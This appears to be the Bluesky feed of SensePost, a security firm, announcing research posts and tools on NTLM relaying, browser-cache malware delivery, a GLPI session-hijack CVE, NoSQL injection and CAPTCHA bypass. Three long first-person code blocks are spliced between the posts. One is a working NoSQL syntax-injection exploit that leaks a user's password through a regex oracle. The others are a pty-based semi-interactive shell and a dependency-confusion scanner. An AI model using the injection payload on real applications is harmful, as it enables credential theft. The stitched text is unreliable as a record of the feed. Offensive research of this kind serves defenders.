SensePost
@sensepost.com
290 followers 16 following 19 posts
Work like hell, Share all you know, Abide by your handshake, Have fun. - Dan Geer
Reposted by SensePost
leonjza.bsky.social
I've been hacking on a new Windows Named Pipe tool called PipeTap which helps analyse named pipe communications. Born out of necessity while doing some vulnerability research on a target, it's been super useful in reversing its fairly complex protocol. :)
The proxy view for PipeTap, a Windows Named Pipe Analysis Tool
sensepost.com
Reverse engineering Microsoft’s SQLCMD.exe to implement Channel Binding support for MSSQL into Impacket’s mssqlclient.py. Storytime from Aurelien (@Defte_ on the bird site), including instructions for reproducing the test environment yourself.

sensepost.com/blog/2025/a-...
A screenshot of two windows. The top is a view of the Microsoft SQL management GUI showing that “Extended Protection” is enabled for NTLM authentication. The bottom is a terminal showing an invocation of Impacket’s mssqlclient.py successfully connecting using channel binding.
sensepost.com
Adriaan was struggling to get an interactive shell on the *nix application server he had popped, so he wrote a turn-based mini binary to give you a semi-interactive shell in restrictive environments. Writeup & code are at

👇
sensepost.com/blog/2025/no...
A screenshot of the tool in action firing up an ssh session to another host.
./shellnot --daemon &
./shellnot --session 1 --input "ssh root@2.domain.com"
./shellnot --session 1 --output
ssh root@2.domain.com

root@2.domain.com's password:
./shellnot --session 1 --input "toor"
./shellnot --session 1 --output

Last login: Sat May 24 16:45:40 2025 from 10.0.0.2
[root@localhost ~]$
./shellnot --session 1 --input "id"
./shellnot --session 1 --output
id
uid=1001(root) gid=1001(root) groups=1001(root),970(docker),998(wheel)
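The core of the turn-based approach above is a held pseudo-terminal: a child shell that believes it has a tty, driven one input turn and one output turn at a time. As an added example (my own code, not shellnot's), here is a minimal in-process Python version of that idea; the real tool runs the session side as a daemon and feeds it from separate invocations, which is not reproduced here.

```python
import os
import pty
import select
import subprocess


class TurnBasedShell:
    """Hold a child shell on a pseudo-terminal and drive it one turn at a time.

    The child sees a terminal, so programs that insist on a tty (ssh asking for
    a password, su, interactive installers) behave normally, while the operator
    only ever sends a line and later collects whatever output accumulated.
    """

    def __init__(self, argv=("/bin/sh",)):
        self.master, slave = pty.openpty()
        self.proc = subprocess.Popen(
            list(argv),
            stdin=slave, stdout=slave, stderr=slave,
            start_new_session=True,   # detach from our own controlling terminal
            close_fds=True,
        )
        os.close(slave)  # the child keeps its own copy of the slave side

    def send(self, line):
        """Input turn: write one line as if it had been typed at the terminal."""
        os.write(self.master, (line + "\n").encode())

    def read(self, first_timeout=2.0, idle_timeout=0.2):
        """Output turn: wait for output, then drain until the child goes quiet."""
        chunks = []
        timeout = first_timeout
        while True:
            ready, _, _ = select.select([self.master], [], [], timeout)
            if not ready:
                break
            try:
                chunk = os.read(self.master, 4096)
            except OSError:      # EIO: the child exited and the slave side is gone
                break
            if not chunk:
                break
            chunks.append(chunk)
            timeout = idle_timeout
        return b"".join(chunks).decode(errors="replace")

    def run(self, line):
        """Convenience: one input turn followed by one output turn."""
        self.send(line)
        return self.read()

    def close(self):
        try:
            self.send("exit")
        except OSError:
            pass
        try:
            self.proc.wait(timeout=5)
        except subprocess.TimeoutExpired:
            self.proc.kill()
        os.close(self.master)


def demo():
    """Drive a local /bin/sh through the pty; returns the output of two turns."""
    sh = TurnBasedShell()
    sh.read(first_timeout=0.5)   # swallow any banner or initial prompt
    first = sh.run("echo turn-based")
    second = sh.run("printf '%s\\n' one two | wc -l")
    sh.close()
    return first, second


if __name__ == "__main__":
    for out in demo():
        print(out, end="")
```

Because the pty echoes input, each turn's output starts with the command line itself, followed by the program's output and, for an interactive shell, its prompt; a real tool would strip the echo and track the prompt to know when a turn is complete.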
Reposted by SensePost
leonjza.bsky.social
Quite stoked to be speaking at @defcon.bsky.social 33 this year, presenting: "7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built".

Reversing, exploits, disclosure pain - it has it all, and it's going to be fun! 💥

See ya soon Vegas. ☀️
Email subject stating: "Congrats! Your DEF CON 33 Submission is accepted!"
Reposted by SensePost
felmoltor.me
I was talking with someone about dependency confusion and supply chain attacks and I was confused myself with the feasibility of doing this in 2025, so I decided to take a practical approach and create my own tool 🔨 to detect Orphan and Misspelled packages 📦: sensepost.com/blog/2025/de...
SensePost | Depscanner: find orphaned packages before the bad guys do
sensepost.com
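The two checks named above, orphan and misspelled packages, are simple to express. As an added example (my own code, not Depscanner's), the scanner below flags dependency names that nobody has registered on the public index (assumed here to be what "orphan" means, and the precondition for a dependency-confusion claim) and names within one edit or transposition of a popular package. The dependency list, stub index and popular list are constructed sample data; `pypi_exists` is an optional live lookup against PyPI's JSON API.

```python
import urllib.request
from urllib.error import HTTPError


def osa_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute plus adjacent
    transposition, so 'reqeusts' is 1 away from 'requests' rather than 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def pypi_exists(name):
    """Live check (network): https://pypi.org/pypi/<name>/json answers 404 for
    names nobody has registered."""
    try:
        with urllib.request.urlopen(f"https://pypi.org/pypi/{name}/json", timeout=10) as resp:
            return resp.status == 200
    except HTTPError as err:
        if err.code == 404:
            return False
        raise


def scan(dependencies, public_exists, popular, max_distance=1):
    """Return (name, finding) pairs. public_exists is a callable so the scan can
    run against a stub index offline or against pypi_exists for real."""
    findings = []
    for name in dependencies:
        norm = name.lower().replace("_", "-")   # PEP 503 style normalisation
        if not public_exists(norm):
            findings.append((name, "orphan: not registered on the public index, "
                                   "anyone can claim the name there"))
        for candidate in popular:
            if norm != candidate and osa_distance(norm, candidate) <= max_distance:
                findings.append((name, f"possible misspelling of {candidate}"))
    return findings


# Constructed sample data: a project's dependency list, a stub of the public
# index, and a short "popular packages" list to compare against.
SAMPLE_DEPENDENCIES = ["requests", "reqeusts", "acme-internal-utils", "numpy"]
STUB_PUBLIC_INDEX = {"requests", "numpy", "flask"}
POPULAR = ["requests", "numpy", "flask", "django"]


def demo():
    return scan(SAMPLE_DEPENDENCIES, lambda n: n in STUB_PUBLIC_INDEX, POPULAR)


if __name__ == "__main__":
    for name, finding in demo():
        print(f"{name}: {finding}")
    # Against the live index instead: scan(SAMPLE_DEPENDENCIES, pypi_exists, POPULAR)
```

An internal package that is absent from the public index is only a problem if a resolver is allowed to consult that index for it, so the fix for an orphan finding is either to register the name yourself or to pin the private index for that package, not merely to rename it.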
sensepost.com
Did we mention all this is done in the cloud with access to the labs available after the training for you to keep up practice post Vegas.
singe.bsky.social
Wifi hacking can be a useful tool, but people are out here grinding on WPA2 handshake cracking tutorials & menu driven attack tooling. When we built the 3rd and latest iteration of the wifi hacking course for BlackHat - we did it to show what really works and how it really works. 1/7
A DALL-E generated image of a hooded person behind a computer with a large glowing wifi symbol on it. In the background are neon posters with the words WPA2 handshake cracking, PEAP relay access, certificate bypass and BLACK HAT. The style is neon cyberpunk.
sensepost.com
After identifying a mistake relating to NTLMv1 being enabled in the test environment, the blog has been updated with an errata section.
sensepost.com
Unsatisfied with merely relying on reFlutter to do its magic, Jacques dove deep to understand how Flutter's SSL pinning in Android works, and how to intercept it with Frida.

sensepost.com/blog/2025/in...
A screenshot of code from BoringSSL's certificate validation function.
sensepost.com
The S is for Security. How to use WinRMS as a solid NTLM relay target, and why it’s less secure than WinRM over HTTP.

writeup: sensepost.com/blog/2025/is...

PR to impacket:
github.com/fortra/impac...

Demo: youtu.be/3mG2Ouu3Umk
WinRMS Relaying
YouTube video by Sense Post
youtu.be
Reposted by SensePost
leonjza.bsky.social
Whipped together a SOCKS5-over-any-transport feature today for the c2 & implant used in @sensepost.com purple teaming / emulation exercises.

Here I have a cURL request, over an ICMP channel, funnelling HTTP requests in and out via our implant :D

Fun! 😄🔥
C2 console logs showing a SOCKS5 proxy having started on port 1800 Implant logs showing an ICMP channel enabled, HTTP channel disabled and a proxy server started targeting the ICMP channel. cURL configured to use a SOCKS5 proxy (pointing at the C2), targeting an IP on the other side of the implant.
sensepost.com
Dropping Teams malware via the browser’s cache - part II of Aurélien’s Browser Cache Smuggling covers his Insomni’hack talk with end to end weaponisation sensepost.com/blog/2025/br...

Demo: youtu.be/tIveWYfYcCI
A screenshot from the demo video on YouTube showing the final state. There are four windows. Firefox open on an innocent looking page with the heading “Socrates: The Father of Western Philosophy”. Below it is a PowerShell terminal that was used to find the malicious DLL in the browser’s cache, and move it to c:\users\windev\appdata\local\Microsoft\Teams\current\VERSION.dll On the right is process explorer showing Teams running as normal with no malicious subprocess. Lastly the bottom window is a cmd terminal showing the reverse shell having connected and giving access to the command line of the victim host.
sensepost.com
GLPI (popular in France & Brazil) versions 9.5.0-10.0.16 allow hijacking sessions of authenticated users remotely. The details & process of discovering the vulnerability are detailed by @GuilhemRioux here:
sensepost.com/blog/2025/le...

Tooling: github.com/Orange-Cyber...

Demo: youtu.be/OTaCV4-6qHE
Screenshot from the YouTube POC showing output from the tool highlighting that an instance is vulnerable

› glpwnme -t http://localhost -e leakymetry --infos
CVE_2024_50339
CVSS: 9.3/10
Author: RIOUX Guilhem
Privileges required: Unauthenticated
Vulnerable from Version 9.5.0 and strictly below 10.0.17
Description:
This exploit allows you to recover the telemetry of GLPI. It Contains the whole informations about the target architecture / versions.

Usage:
Add -0 show_all=1 to display urls accessible for enumeration

Please note that this exploit make a request to the update DB
This options is designed originally to help a migration of the SQL DB from old versions
This migration is harmless, and is triggered only if the migration file has been explicitly downloaded

Side effect:
Leakymetry might disable the plugins in use

Exploit is Dangerous
Orange Cyberdefense
Reposted by SensePost
sensepost.com
Using frida-trace to hook thousands of methods in one go and get clean, readable output for large, obfuscated mobile apps 📲. Another post from Reino to level up your dynamic analysis: sensepost.com/blog/2025/us...
Using & improving frida-trace
Reading time ~17 min
Posted by Reino Mostert on 19 March 2025
Categories: Frida, Mobile
TL;DR In this blog I want to show you how useful frida-trace can be at hooking thousands of methods at a time. I also wrote some scripts for improving its output a bit.
sensepost.com
The first part can be found here bsky.app/profile/sens...
sensepost.com
A look at some of the trickier NoSQL injection scenarios from Reino. With ways of manipulating the query to deal with pre/post conditions successfully sensepost.com/blog/2025/ge...

(v3 of this skeet because there's no edit button and I need a proof reader)
Syntax injection into the JSON query filter (New Stuff)

In this case, the developers are using string concatenation, or more likely string interpolation to construct the query filter, before making it into a JSON object, and passing it to MongoDB.

We can thus add in our own query conditions. This is a bit of a game changer from operator injection, since we can now query on the fields we want, instead of being stuck inside an existing field.
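As an added example (my own code, not Reino's), here is the difference between operator injection and the syntax injection the excerpt describes, run against a small in-memory stand-in for a MongoDB collection rather than a real database. The application's filter template, its field order, and the user records are assumptions. The interesting part is `leak_via_regex`: because the attacker controls the filter text, a closing quote followed by `"field": {"$regex": "^prefix"}` turns the login into a boolean oracle for any field of the target document, which is the "query on the fields we want" point above.

```python
import json
import re
import string

# Constructed in-memory stand-in for a MongoDB "users" collection.
USERS = [
    {"username": "admin", "password": "s3cret!", "role": "admin"},
    {"username": "bob", "password": "hunter2", "role": "user"},
]

# Subset of filter semantics needed here: a filter is an AND of field
# conditions; a condition is either a literal or a dict of $operators.
OPERATORS = {
    "$ne": lambda actual, arg: actual != arg,
    "$regex": lambda actual, arg: isinstance(actual, str) and re.search(arg, actual) is not None,
}


def matches(doc, query):
    for field, cond in query.items():
        actual = doc.get(field)
        if isinstance(cond, dict) and cond and all(k.startswith("$") for k in cond):
            if not all(OPERATORS[op](actual, arg) for op, arg in cond.items()):
                return False
        elif actual != cond:
            return False
    return True


def find(query):
    return [doc for doc in USERS if matches(doc, query)]


def login_vulnerable(username, password):
    """Assumed application code: the filter is built as text, then parsed.
    Field order (password before username) is an assumption that only
    shapes the payload below."""
    raw = '{"password": "%s", "username": "%s"}' % (password, username)
    # Duplicate keys: json.loads keeps the last one, as JavaScript's JSON.parse does,
    # so an injected condition can override the one the template wrote earlier.
    return find(json.loads(raw))


def login_safe(username, password):
    """Fix: build the filter as a structure so input can never become syntax,
    and reject non-strings so operator injection from a JSON body is blocked too."""
    if not isinstance(username, str) or not isinstance(password, str):
        raise TypeError("credentials must be strings")
    return find({"username": username, "password": password})


# Characters that need no escaping in either JSON or a regex. A real payload
# generator would escape the remaining characters instead of skipping them.
SAFE_ALPHABET = string.ascii_letters + string.digits + "!_-"


def leak_via_regex(target_user, field, alphabet=SAFE_ALPHABET, max_len=32):
    """Boolean oracle: each login asks 'does <field> of <target_user> start with
    <prefix>?'. The payload closes the username string, neutralises the password
    check with $ne, adds its own $regex condition, then re-opens a username
    value so the template's trailing quote still parses."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            payload = (f'{target_user}", "password": {{"$ne": ""}}, '
                       f'"{field}": {{"$regex": "^{known + ch}"}}, '
                       f'"username": "{target_user}')
            if login_vulnerable(payload, "x"):
                known += ch
                break
        else:
            break  # no character extends the prefix: the value is fully recovered
    return known


if __name__ == "__main__":
    print(leak_via_regex("admin", "password"))
    print(leak_via_regex("admin", "role"))
```

Operator injection needs the application to accept a JSON object where a string was expected and only lets you change the operator applied to that one field; syntax injection needs the filter to be assembled as text and lets you write arbitrary conditions on arbitrary fields, which is why a character-by-character `$regex` oracle works against any field of the document.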
sensepost.com
The second part just went up bsky.app/profile/sens...
sensepost.com
Reino takes his NoSQL injection series a bit further with (maybe) new techniques for more efficient error based NoSQL injections in this follow up post: sensepost.com/blog/2025/no...
NoSQL error-based injection
Reading time ~6 min
Posted by Reino Mostert on 15 March 2025
Categories: Database, Nosql injection, Injection, Nosql
TL;DR How to do NoSQL error-based injection
In this second blog post on NoSQL injection, I discuss how to do error-based injection. I think this might be a novel approach – at least my Google search-fu isn’t finding anything.
Reposted by SensePost
singe.bsky.social
Some great research writeups and tool releases hitting the @sensepost.com blog and GitHub the last few days:
Capchan – Solving CAPTCHA with Image Classification
Reading time: ~34 min
Posted by adriaan.bosch on 13 March 2025
Categories: Ai, Ctf, Neural-nets, Tool

Getting rid of pre- and post-conditions in NoSQL injections
Reading time: ~10 min
Posted by Reino Mostert on 11 March 2025
Categories: Database, Nosql injection, Injection, Nosql

goLAPS
Reading time: ~3 min
Posted by Felipe Molina on 10 March 2025
Categories: Golang, Laps, Sensecon

Diving Into AD CS: Exploring Some Common Error Messages
Reading time: ~26 min
Posted by Jacques Coertze on 07 March 2025
Categories: Active directory, Adcs, Certificates, Internals, Windows, Certificate

InvokeADCheck – A PowerShell Module for Assessing Active Directory
Reading time: ~5 min
Posted by niels.hofland on 06 March 2025
Categories: Active directory, Automation, Powershell, Tool

PsExec’ing the right way and why zero trust is mandatory
Reading time: ~20 min
Posted by aurelien.chalot on 10 February 2025
Categories: Psexec, Sensecon, Tools
sensepost.com
Want a hacker's introduction to using neural networks to create a tool to bypass CAPTCHAs? Adriaan's got you.

Writeup: sensepost.com/blog/2025/ca...

Accompanying training/classifying tool capchan github.com/sensepost/ca...
A screenshot from the README of the capchan tool. It has terminal output showing the help menu of the tool. It has an ASCII art Sigmoid and ReLU xy graph in varying colours. The menu says "Choose the type of project below (use arrow keys) 1 New Model 2 Start PoC 3 Help Page. Underneath the terminal output the readme says:
Creates and trains a model based on provided greyscale images
Uses greyscale model against other images to determine image contents
sensepost.com
One part learning some golang, another part having an exe to manipulate LAPS passwords remotely, in this post @felmoltor.me introduces goLAPS.

github.com/sensepost/go...

sensepost.com/blog/2025/go...
github.com
sensepost.com
Attacks against AD CS are de rigueur these days, but sometimes a working attack doesn’t work somewhere else, and the inscrutable error messages are no help. Jacques replicated the most infuriating and explains what’s happening under the hood in this post: sensepost.com/blog/2025/di...
SensePost | Diving into ad cs: exploring some common error messages
sensepost.com
sensepost.com
Want some handy powershell scripts to make your AD auditing life easier, Niels has your back with InvokeADCheck. Includes easy to add module system as well as consistent output and excel exports.

sensepost.com/blog/2025/in...
sensepost.com
Instead of relying on RemCom, what if we had a python client to interact with the latest, Microsoft signed PSExec? In this post Aurélien details how he and the team did exactly this, including a tool, some PSExec internals and detection opportunities!

sensepost.com/blog/2025/ps...